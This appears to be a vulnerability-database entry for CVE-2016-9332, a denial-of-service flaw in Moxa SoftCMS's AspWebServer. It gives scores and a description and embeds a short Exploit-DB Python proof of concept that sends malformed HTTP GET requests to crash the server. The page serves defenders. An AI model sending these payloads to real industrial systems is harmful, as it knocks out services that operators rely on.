CVE-2016-9332

high

Published 2017-02-13 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.5

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. Moxa SoftCMS Webserver does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.

Predictions

Exploit likelihood

83%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-40779 dos windows python · 1 KB

Zhou Yu · 2016-11-18

Moxa SoftCMS 1.5 - Denial of Service (PoC)

python exploit Source: Exploit-DB

'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: 504137480@qq.com
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02

Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.


Vulnerability Discovery Method:
With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''

import socket
host = '192.168.124.128'    
port = 81

# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()

Application impact

Vendor	Product	Versions	Fixed
moxa	softcms	`{"endIncluding":"1.5"}`

References

CWEs

CWE-399

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.